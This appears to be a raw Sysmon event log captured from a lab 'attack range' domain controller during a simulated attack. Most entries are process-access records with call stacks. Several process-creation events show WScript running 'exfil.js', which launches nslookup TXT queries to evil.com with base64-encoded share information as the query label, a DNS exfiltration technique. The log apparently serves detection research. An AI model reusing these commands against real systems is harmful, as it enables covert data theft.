14:21:48.735{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-FE45-000000005F02}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.735{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-FE45-000000005F02}4836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.735{2E1864BB-18FC-629A-FE45-000000005F02}48366408C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-FD45-000000005F02}7632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-FE45-000000005F02}4836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-FD45-000000005F02}7632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-18E0-629A-6742-000000005F02}39767900C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-FD45-000000005F02}7632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.721{2E1864BB-18FC-629A-FD45-000000005F02}7632C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllqbzts.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.704{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhoj.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-18FC-629A-FB45-000000005F02}51965232C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-FC45-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-FC45-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.667{2E1864BB-18FC-629A-FA45-000000005F02}27887452C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-FC45-000000005F02}7224C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.671{2E1864BB-18FC-629A-FC45-000000005F02}7224C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-FA45-000000005F02}2788C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhoj.tmp 2>&1 10341000x8000000000000000214685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.635{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-FB45-000000005F02}5196C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.635{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-FB45-000000005F02}5196C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.635{2E1864BB-18FC-629A-FB45-000000005F02}51965232C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-FA45-000000005F02}2788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-FB45-000000005F02}5196C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-FA45-000000005F02}2788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-18E0-629A-6742-000000005F02}39762608C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-FA45-000000005F02}2788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.624{2E1864BB-18FC-629A-FA45-000000005F02}2788C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhoj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.620{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlebhd.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 